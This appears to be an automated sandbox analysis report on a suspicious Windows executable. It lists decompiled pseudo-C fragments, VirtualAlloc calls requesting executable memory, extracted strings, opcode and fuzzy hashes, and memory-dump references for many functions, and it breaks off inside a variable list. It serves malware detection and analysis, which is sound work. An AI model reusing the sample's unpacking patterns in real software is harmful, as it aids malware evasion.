Instruction Fuzzy Hash: D422DE81A6A30689FF722060C5D076D6550DF16781F308F37D861F58E6FA2FC9CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 00409A2A, Relevance: 6.8, APIs: 1, Strings: 3, Instructions: 791
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 52%

			E00409A2A(signed int __eax, void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __fp0) {
				signed int _t16;
				void* _t17;
				void* _t23;
				void* _t43;
				void* _t47;
				void* _t411;

				_t411 = __fp0;
				_t47 = __esi;
				_t43 = __edi;
				_t23 = __ebx;
				_t16 = __eax;
				 *__eax =  *__eax | __ecx;
				 *__eax =  *__eax | __ecx;
				 *__eax =  *__eax | __ecx;
				 *__eax =  *__eax | __ecx;
				 *__eax =  *__eax | __ecx;
				 *__eax =  *__eax | __ecx;
				 *__eax =  *__eax | __ecx;
				 *__eax =  *__eax | __ecx;
				 *__eax =  *__eax | __ecx;
				 *__eax =  *__eax | __ecx;
				 *(__ebx - 0x47cfd08) =  *(__ebx - 0x47cfd08) | __eax;
				asm("fucom st1");
				asm("fabs");
				asm("fsubp st5, st0");
				asm("fst st1");
				asm("psrld mm4, 0xc0");
				asm("pand mm5, mm4");
				asm("packssdw xmm6, xmm4");
				asm("ffree st7");
				asm("fclex");
				asm("fninit");
				asm("paddw xmm1, xmm4");
				goto L4;
				_t17 =  *_t16;
			}

0x00409a2a
0x00409a2a
0x00409a2a
0x00409a2a
0x00409a2a
0x00409a6e
0x00409a70
0x00409a72
0x00409a74
0x00409a76
0x00409a78
0x00409a7a
0x00409a7c
0x00409a7e
0x00409a80
0x00409a82
0x00409aa2
0x00409aa4
0x00409aa6
0x00409aa8
0x00409aaa
0x00409aae
0x00409ab1
0x00409ab5
0x00409ab7
0x00409b40
0x00409b42
0x00409b42
0x00409bac

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: 9$L$u
API String ID: 4275171209-3980657970
Opcode ID: cacd51275a67801c5c7501efb0cab45628489fc7612a334ae5d41bf2eabd6dd1
Instruction ID: 5739849da83c41a43270598e26f1522719fa9179f31498ae85fff9613a76e417
Opcode Fuzzy Hash: cacd51275a67801c5c7501efb0cab45628489fc7612a334ae5d41bf2eabd6dd1
Instruction Fuzzy Hash: 8322DE81A6A30689FF722020C5D076D6550DF16781F308F37D862F58E6FA2FCACA159B

Uniqueness

Uniqueness Score: -1.00%

Function 00409ABB, Relevance: 6.8, APIs: 1, Strings: 3, Instructions: 783
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E00409ABB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t32;
				void* _t38;
				void* _t58;
				void* _t62;
				void* _t417;

				_t417 = __fp0;
				_t62 = __esi;
				_t58 = __edi;
				_t38 = __ebx;
				asm("sbb edi, [ebp-0x4747ef74]");
				asm("fninit");
				asm("paddw xmm1, xmm4");
				goto L2;
				_t32 =  *0xd03d;
			}

0x00409abb
0x00409abb
0x00409abb
0x00409abb
0x00409abb
0x00409b40
0x00409b42
0x00409b42
0x00409bac

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: 9$L$u
API String ID: 4275171209-3980657970
Opcode ID: 7fe1680639b0cf15b514e493edbf251ad80baf07abb5fd94c7b81798344474fa
Instruction ID: d5cab96d055ee804031d9286d842738ec29eb55a80a69af3e4a7c7ec0fecc677
Opcode Fuzzy Hash: 7fe1680639b0cf15b514e493edbf251ad80baf07abb5fd94c7b81798344474fa
Instruction Fuzzy Hash: A222DE41A6A30689FF722020C5D076D6540DF16781F308F37D861F59E6FA2FCACA1597

Uniqueness

Uniqueness Score: -1.00%

Function 00409B50, Relevance: 6.8, APIs: 1, Strings: 3, Instructions: 783COMMON

Download Yara Rule

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 9$L$u
API String ID: 0-3980657970
Opcode ID: c85f9c2ee71cb0bd23c895b3c705d580d7b5181a527b39cd80bcf4bec616212f
Instruction ID: 2c324ad9492580d65198c5d8d3a4e70e1e5fccff41af3be472cdf08532564045
Opcode Fuzzy Hash: c85f9c2ee71cb0bd23c895b3c705d580d7b5181a527b39cd80bcf4bec616212f
Instruction Fuzzy Hash: DD22EE81E6A30689FF726120C5D076D6680DF16781F308F37D861F58E2FA2F8ACA1597

Uniqueness

Uniqueness Score: -1.00%

Function 00409D0C, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 783memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

}KKK, xrefs: 00409D0E

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: }KKK
API String ID: 4275171209-912116650
Opcode ID: 43904e747062f506ada0e707dc62db40b1384e0e62fcad9562910eb338d40444
Instruction ID: fa4e087c96c40cb2cc4c39279428cc6325e9002b901bd22f94c23fcc72223f65
Opcode Fuzzy Hash: 43904e747062f506ada0e707dc62db40b1384e0e62fcad9562910eb338d40444
Instruction Fuzzy Hash: 8212CD81E6A70689FF722020C5D076D6580DF16781F308F37D862F58E6BA2FC6CA159B

Uniqueness

Uniqueness Score: -1.00%

Function 00409BE2, Relevance: 2.2, APIs: 1, Instructions: 900COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c36ac7c7e4ea7a99489def763f85aff4deffa350e5be0cca8baeb8331ba47c0
Instruction ID: 6ed2807957eea8d092b1ccf11325fa3ceda5bf2086c25ca4aae48fcdf198ad21
Opcode Fuzzy Hash: 3c36ac7c7e4ea7a99489def763f85aff4deffa350e5be0cca8baeb8331ba47c0
Instruction Fuzzy Hash: C932EE81D5E30689FF726124C5D076D6680DF26381F308F37D861F98D7AA2F8ACA158B

Uniqueness

Uniqueness Score: -1.00%

Function 00409E30, Relevance: 1.9, APIs: 1, Instructions: 690memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8a1b2e73f0906a3985013599c2bb9864cae99a776ee9475a54d68518f8cda08a
Instruction ID: e6a92d11bf77048bb8356ab216088184eb9cde6f741631047874cb8a77486e5c
Opcode Fuzzy Hash: 8a1b2e73f0906a3985013599c2bb9864cae99a776ee9475a54d68518f8cda08a
Instruction Fuzzy Hash: 3212DE51A6A30689FF726120C5D076D6680DF16781F308F37D861F68D2FA2FC5CA159B

Uniqueness

Uniqueness Score: -1.00%

Function 00409DED, Relevance: 1.9, APIs: 1, Instructions: 679memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 82444f13d646469b2017b5312adaa5df72d1b3987e260609369ea1d885a5f1aa
Instruction ID: b3d667a89c0b0a09299a8145740715b05a74287e5d9b2fe271fd231c7552c564
Opcode Fuzzy Hash: 82444f13d646469b2017b5312adaa5df72d1b3987e260609369ea1d885a5f1aa
Instruction Fuzzy Hash: 3F12BC81A6A70689FF722020C5D076D6580DF16781F308F37D862F58E6BA2FC6CA159B

Uniqueness

Uniqueness Score: -1.00%

Function 00409F5F, Relevance: 1.9, APIs: 1, Instructions: 674memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0c5351efe40dc864a5da19682f5a59e730fa26960c67719079da75c8c69eda5d
Instruction ID: f8e5435e3518a2d3e389529f71cf75f35b9c70125e988763e973d97917dffea4
Opcode Fuzzy Hash: 0c5351efe40dc864a5da19682f5a59e730fa26960c67719079da75c8c69eda5d
Instruction Fuzzy Hash: A002CC81A6A30689FF722130C5D076D5580DF56781F308F37D862F58E2BA2F85CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 00409EC4, Relevance: 1.9, APIs: 1, Instructions: 662memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 34a1ddc97ee52ba81ce1048b7c81681c2c1d2a6c3a1bcc4985af2bd67c5dcf00
Instruction ID: bf230802c5d8efc967cafb3e0a7cb58dc0651056b916b8e0259e0115a1b14c14
Opcode Fuzzy Hash: 34a1ddc97ee52ba81ce1048b7c81681c2c1d2a6c3a1bcc4985af2bd67c5dcf00
Instruction Fuzzy Hash: C702BB81A6A30689FF722120C5D076D6580DF16781F308F37D862F68E2BA2FC9CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 00409FE9, Relevance: 1.9, APIs: 1, Instructions: 656memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 84295f4b378d5ad728eaa1be4cce986b01627cf5d9ca63b90a68a526e9e37a37
Instruction ID: 3fed88f660507fa9638904387b4976b5e63c89403a28fe55e99c99cb216cd5c5
Opcode Fuzzy Hash: 84295f4b378d5ad728eaa1be4cce986b01627cf5d9ca63b90a68a526e9e37a37
Instruction Fuzzy Hash: DE02BC81A6A30689FF722030C5D076D6580DF66781F308F37D822F58E2BA2F85CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 0040A193, Relevance: 1.9, APIs: 1, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d531cc1ebd3ecb82e62eda3efbf660f8eb43725de5134d542cd02540f1040f25
Instruction ID: 68321423f0f9e14fa7eabb5e3fb7a647264d05c36de406b231262ce8e5340096
Opcode Fuzzy Hash: d531cc1ebd3ecb82e62eda3efbf660f8eb43725de5134d542cd02540f1040f25
Instruction Fuzzy Hash: 17F1AB81A6A70689FF722030C5D076E6580DF66781F318F37D862F58E2BA2F85CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 0040A101, Relevance: 1.9, APIs: 1, Instructions: 627memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 03e06f1463b88caf55aa00fcf98006ea7b340a532f9364e4fbbe9c1b1b34fb20
Instruction ID: 6d411e8fe3d1b880098984ba25f65a451a80e7ac94758de3f0393a713f7a06cd
Opcode Fuzzy Hash: 03e06f1463b88caf55aa00fcf98006ea7b340a532f9364e4fbbe9c1b1b34fb20
Instruction Fuzzy Hash: F0F1BC81A6A30689FF732030C5D0B6D6580DF26785F318F37D862F58E2BA2F85CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 0040A078, Relevance: 1.9, APIs: 1, Instructions: 614memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7d9d17e7ee7fa77cd3431e8bbe0288ce6b4f27eeab98ddf19427a225ec2a7dc6
Instruction ID: e8fa4ccededfd4fc5e818e13054c5a29ee84530f3c7a22025811558c27ce780c
Opcode Fuzzy Hash: 7d9d17e7ee7fa77cd3431e8bbe0288ce6b4f27eeab98ddf19427a225ec2a7dc6
Instruction Fuzzy Hash: 7A02BC81A6A30689FF732030C5D076D6580DF26781F708F37D862F58E6BA2F85CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 0040A50A, Relevance: 1.8, APIs: 1, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 618dc04634bc4a9ffca4b7fb17348507fc7597d425b6bef1fbc6d319ef1087f1
Instruction ID: 57873af3c509face91804aade12e856e2c12b3fb0255e5f3f5fe9a621091492d
Opcode Fuzzy Hash: 618dc04634bc4a9ffca4b7fb17348507fc7597d425b6bef1fbc6d319ef1087f1
Instruction Fuzzy Hash: 33E10345E6A70699EF732031C9D076D6580EF26385F308F3BD821F58D2BA2F85DA158B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A356, Relevance: 1.8, APIs: 1, Instructions: 552memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9580b62adc180a15c9ef27e8175799db2e89c1758d742f27e44cb9cf9b280c78
Instruction ID: ff3c16c1864e443a8249d12357740b73c4bf93b6773da403b09b3594db1e1bc4
Opcode Fuzzy Hash: 9580b62adc180a15c9ef27e8175799db2e89c1758d742f27e44cb9cf9b280c78
Instruction Fuzzy Hash: 98E1AB81E6A30689EF732030C5D076D5581DF66785F718F37D822F58E2BA2F86CA1587

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2C0, Relevance: 1.8, APIs: 1, Instructions: 540memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0656fb2b55a6d60e849f838f3db85a37ecf8e9293250a27c2e0cd2a7446621be
Instruction ID: e78a16daec70b8b5c9979b3f4a53a752835bef24987fa05798e05ff47bf385e3
Opcode Fuzzy Hash: 0656fb2b55a6d60e849f838f3db85a37ecf8e9293250a27c2e0cd2a7446621be
Instruction Fuzzy Hash: A9E1AB81E6A30689EF732030C5D076D5581DF66781F718F37D826F58E2BA2F86CA1587

Uniqueness

Uniqueness Score: -1.00%

Function 0040A595, Relevance: 1.8, APIs: 1, Instructions: 530memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5a1d87fdc5deb1c6355ed65bb1bf6fa4bc4a6f1138b348295ec272601314dbc9
Instruction ID: fd4f252135d31ca665aebe337cec30331d731708fddeb274ae4016f0e0eb6a12
Opcode Fuzzy Hash: 5a1d87fdc5deb1c6355ed65bb1bf6fa4bc4a6f1138b348295ec272601314dbc9
Instruction Fuzzy Hash: 78C1BD41E6A30685EF732030C9D076DA581DF66781F318F37D866F58D2BA2F85CA1587

Uniqueness

Uniqueness Score: -1.00%

Function 0040A628, Relevance: 1.8, APIs: 1, Instructions: 512memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ee71b7fe0d8a9936f10b3f7f5b50fe1ee17dc8773ca99ef06e3585cf0b291691
Instruction ID: c66762e7a8e55fd6a181437389ddd517bb760b9b59ffb9e6ba0e4b843b22b5e8
Opcode Fuzzy Hash: ee71b7fe0d8a9936f10b3f7f5b50fe1ee17dc8773ca99ef06e3585cf0b291691
Instruction Fuzzy Hash: 2EC1BD41E6A30685EF732030C9D076DA581DF66781F318F37D826F58D2BA2F85CA258B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A478, Relevance: 1.7, APIs: 1, Instructions: 489memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3c0b458bc41c629a3b4315fd235112e59b72cfc6a7ef50c396e0fca066702251
Instruction ID: d21382a34bb0adc52a57d0b8bcf924039631b7f90152c7f9280ba49a6102c5b0
Opcode Fuzzy Hash: 3c0b458bc41c629a3b4315fd235112e59b72cfc6a7ef50c396e0fca066702251
Instruction Fuzzy Hash: B9D1BC81E6A30689EF732030C5D076D6581DF66785F318F37D862F58D2BA2F85CA2587

Uniqueness

Uniqueness Score: -1.00%

Function 0040A746, Relevance: 1.7, APIs: 1, Instructions: 440memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 858dfa5e4906314c19c33eba4da28473609b22b394c57fb61b47cb4306c45bc1
Instruction ID: f0b6954d0bdcb7d0f75fd21da78b47f1452457f002b9694e8697ede584c23d39
Opcode Fuzzy Hash: 858dfa5e4906314c19c33eba4da28473609b22b394c57fb61b47cb4306c45bc1
Instruction Fuzzy Hash: 52B1CE41E6A30685EF732030C9D079DA581DF56781F318F37D866F58E2BA2F85CA158B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A862, Relevance: 1.7, APIs: 1, Instructions: 424memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 403e6414aa4eb71889bb2e1d77809d0907b6d2c810617fea2785b268ab1a52ba
Instruction ID: b24da2c8b20fba4bca6ad47acf46d25383227cd60be026565fe8660df9173261
Opcode Fuzzy Hash: 403e6414aa4eb71889bb2e1d77809d0907b6d2c810617fea2785b268ab1a52ba
Instruction Fuzzy Hash: FBC1DF4696A30684FF722032C5D075E5640CBA2782F30CF37D825F59D2BA6F89DA25CB

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6FC, Relevance: 1.7, APIs: 1, Instructions: 414memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ef859992f0a46ccb6af7f6d1d46cfa5b80f0899f089e765e2128a9e1eadcc3d6
Instruction ID: 216ea6e41674f205a5229d3267560d139d0d469e50000c2107dd188dc107cda2
Opcode Fuzzy Hash: ef859992f0a46ccb6af7f6d1d46cfa5b80f0899f089e765e2128a9e1eadcc3d6
Instruction Fuzzy Hash: FDC1DE41E6A34685EF732030C9D075DA580DF66781F318F37E866F58D2BA2F85CA258B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6B3, Relevance: 1.7, APIs: 1, Instructions: 410memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1c10b997736753fb77d63a0bc349107abc1a1ac82ce22bd915478491487f8c3b
Instruction ID: 1d142eaa878f87abf88998d3cba4ed648a06bf0aee37cf8e5b5b19fc290067ad
Opcode Fuzzy Hash: 1c10b997736753fb77d63a0bc349107abc1a1ac82ce22bd915478491487f8c3b
Instruction Fuzzy Hash: 4BC1DF41E6A34685EF732030C9D075DA581DF66781F318F37D826F58D2BA2F85CA158B

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE69, Relevance: 416.4, APIs: 198, Strings: 39, Instructions: 1646
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040EE69(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a20) {
				void* _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v60;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				char _v88;
				void* _v92;
				char _v96;
				signed int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long long _v116;
				void* _v120;
				char _v124;
				intOrPtr _v128;
				void* _v132;
				short _v136;
				void* _v140;
				signed int _v144;
				void* _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				signed int _v164;
				intOrPtr _v168;
				signed int _v172;
				char _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				intOrPtr _v196;
				char _v204;
				signed int _v212;
				char _v220;
				char _v236;
				signed int _v256;
				signed int _v260;
				char _v268;
				signed int _v276;
				char _v284;
				char* _v292;
				char _v300;
				intOrPtr _v308;
				intOrPtr _v316;
				intOrPtr _v324;
				intOrPtr _v332;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				intOrPtr _v368;
				char _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				intOrPtr* _v440;
				signed int _v444;
				signed int _v448;
				signed long long _v452;
				signed int _v456;
				intOrPtr* _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr* _v476;
				signed int _v480;
				signed int _v484;
				intOrPtr* _v488;
				signed int _v492;
				signed int _v496;
				intOrPtr* _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				intOrPtr* _v520;
				signed int _v524;
				intOrPtr* _v528;
				signed int _v532;
				signed int _v536;
				intOrPtr* _v540;
				signed int _v544;
				signed int _v548;
